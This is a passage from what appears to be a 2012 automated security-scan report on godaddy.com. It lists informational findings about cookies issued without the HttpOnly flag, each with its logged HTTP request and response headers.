Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=73; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:27 GMT
Connection: close
Content-Length: 104816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.117. https://www.godaddy.com/agreements/showdoc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /agreements/showdoc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /agreements/showdoc.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ukvnbsftqtrdmk5xunbwubh5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ukvnbsftqtrdmk5xunbwubh5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=65; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:25 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/agreements/showdoc.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=65; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:25 GMT
Connection: close
Content-Length: 8660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.118. https://www.godaddy.com/domains/customize.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/customize.aspx?ci=14641 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; pagecount=4; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=1&fMajorVer=11&slMajorVer=-1&slMinorVer=-1; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; adc1=US; currency1=potableSourceStr=USD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:35 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/customize.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=14641%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:35 GMT
Content-Length: 165054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.119. https://www.godaddy.com/domains/customize.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/customize.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/domains/nodomain.aspx?ci=17302
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=tls0qyhey40fxeftakfyg0zz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=tls0qyhey40fxeftakfyg0zz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:06 GMT
Connection: close
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/domains/nodomain.aspx?ci=17302">here</a>.</h2>
</body></html>

4.120. https://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/domain-broker.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=auageiizdofjb210w1j2y0dm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=auageiizdofjb210w1j2y0dm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:03 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:03 GMT
Connection: close
Content-Length: 92865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.121. https://www.godaddy.com/domains/popups/icannfee.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/popups/icannfee.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/popups/icannfee.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=uwshsnc43veo2rxw44tbjn2f; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=uwshsnc43veo2rxw44tbjn2f; path=/; HttpOnly
Set-Cookie: SplitValue1=55; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/popups/icannfee.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=55; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:59 GMT
Connection: close
Content-Length: 2083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.122. https://www.godaddy.com/domains/searchresults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/searchresults.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/searchresults.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/domains/search.aspx?ci=53972
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ug2mj50ughc5yetv11ge4mte; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ug2mj50ughc5yetv11ge4mte; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:17 GMT
Connection: close
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/domains/search.aspx?ci=53972">here</a>.</h2>
</body></html>

4.123. https://www.godaddy.com/gdshop/browser_update.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/browser_update.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/browser_update.asp?msvar=true HTTP/1.1
Host: www.godaddy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/23
Cookie: visitor=vid=f2b54a8e-6e54-487a-ba8b-057ce9ed41db; test=ok; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDQUBACAQD=LJHOPMDCEKEPLKEAGHMHKDIL

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB152&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=http%3A%2F%2Fburp%2Fshow%2F23&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 08-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 15-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 08 Mar 2012 20:56:39 GMT
Content-Length: 16684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...

4.124. https://www.godaddy.com/legal-agreements.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /legal-agreements.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /legal-agreements.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ly0fnf4j420wnozzu4yomz3r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ly0fnf4j420wnozzu4yomz3r; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:21 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:21 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:21 GMT; path=/
Set-Cookie: SplitValue1=75; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:21 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/legal-agreements.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:21 GMT
Connection: close
Content-Length: 182283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.125. https://www.godaddy.com/offers/hot-deals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/hot-deals.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers/hot-deals.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=neifplqwwfo5vofgmfhmtoea; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=neifplqwwfo5vofgmfhmtoea; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:19 GMT
Connection: close
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455">here</a>.</h2>
</body></html>

4.126. https://www.godaddy.com/offers/hot-deals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/hot-deals.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers/hot-deals.aspx HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://idp.godaddy.com/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB137
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; pagecount=4; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=1&fMajorVer=11&slMajorVer=-1&slMinorVer=-1; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; adc1=US; traffic=cookies=1&referrer=&sitename=videos.godaddy.com&page=/godaddy_media.aspx&server=M1PWCORPWEB125&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; currency1=potableSourceStr=USD

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:45:37 GMT; path=/
Date: Mon, 05 Mar 2012 01:45:37 GMT
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455">here</a>.</h2>
</body></html>

4.127. https://www.godaddy.com/offers/hot-deals2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/hot-deals2.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/hot-deals2.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hfbvjwwihiuqex24nd3xzdbo; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hfbvjwwihiuqex24nd3xzdbo; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 02:00:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 02:00:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 02:00:12 GMT; path=/
Set-Cookie: SplitValue1=12; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=12; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:12 GMT
Connection: close
Content-Length: 97466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.128. https://www.godaddy.com/offers/jsoncontent/domaindeals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/domaindeals.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/jsoncontent/domaindeals.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=f3duk25uhxn2uj1hdaujgvpt; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=f3duk25uhxn2uj1hdaujgvpt; path=/; HttpOnly
Set-Cookie: SplitValue1=73; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:15 GMT; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/domaindeals.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=73; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:14 GMT
Connection: close
Content-Length: 21787

{"Html":"\r\n \u003cstyle\u003e\r\n .showPride{text-transform:uppercase;color:#fff;height:15px;font-weight:bold;}\r\n .showPride span{display:inline-block;width:10%;height:100%;float:left}\r\n
...[SNIP]...

4.129. https://www.godaddy.com/offers/jsoncontent/productsales.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/productsales.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/jsoncontent/productsales.aspx?ci=51455%2c50961 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xkxjrzfawt0ymo1hwxud4trz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xkxjrzfawt0ymo1hwxud4trz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=78; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/productsales.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=51455%2c50961&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=78; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:18 GMT
Connection: close
Content-Length: 6614

{"Html":" \r\n \u003cstyle\u003e\r\n /*Small sale tag */\r\n .gdhp-sale-banner-small{height:16px;position:relative;top:-10px;}\r\n .gdhp-sale-banner-small-text{position:relative;float:left;
...[SNIP]...

4.130. https://www.godaddy.com/offers/jsoncontent/recommendeddomains.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/recommendeddomains.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers/jsoncontent/recommendeddomains.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=33fsvm40tcmlxjs3ig0a3n5g; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=33fsvm40tcmlxjs3ig0a3n5g; path=/; HttpOnly
Set-Cookie: SplitValue1=7; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendeddomains.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=7; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:17 GMT
Connection: close
Content-Length: 670

{"Html":"\r\n \u003cdiv class=\"dealstitle\"\u003e\r\n \u003cdiv class=\"namematchheading\"\u003e\u003c/div\u003e\r\n \u003ch4\u003eExpand your reach on the Web with personalized domain suggest
...[SNIP]...

4.131. https://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/recommendedoffers.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers/jsoncontent/recommendedoffers.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vxqk0laxobgfz2vx24143m4r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vxqk0laxobgfz2vx24143m4r; path=/; HttpOnly
Set-Cookie: SplitValue1=99; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:16 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendedoffers.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=99; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:16 GMT
Connection: close
Content-Length: 763

{"Html":"\r\n \u003cdiv class=\"dealstitle\"\u003e\r\n \u003ch3\u003eRecommended Offers\u003c/h3\u003e\r\n \u003ch4\u003eDo more online with special savings on the products you really want. Gra
...[SNIP]...

